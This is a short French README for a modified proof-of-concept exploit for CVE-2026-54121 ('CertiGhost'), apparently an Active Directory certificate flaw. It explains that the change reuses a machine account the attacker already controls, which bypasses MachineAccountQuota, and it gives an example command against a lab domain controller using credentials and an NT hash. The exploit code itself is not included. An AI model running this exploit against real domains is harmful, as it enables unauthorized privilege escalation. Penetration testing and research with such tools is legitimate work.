
CVE-2026-54121 (CertiGhost) POC sans MachineAccountQuota
Ce POC est le code POC original provenant de https://github.com/aniqfakhrul/CVE-2026-54121/blob/main/certighost.py mais avec de légères modifications pour utiliser un objet machine que nous contrôlons déjà au lieu de dépendre de la création d'une nouvelle machine, généralement limitée par MachineAccountQuota.
Voir le repo original concernant la vulnérabilité CertiGhost pour plus d'informations.
Exemple d'utilisation :
python3 certighost.py -d playground.local -u lowpriv -p Password123 \
--dc-ip 192.168.209.157 \
--computer-name MACHINEA$ \
--computer-hash <NT_HASH_MACHINE_A$>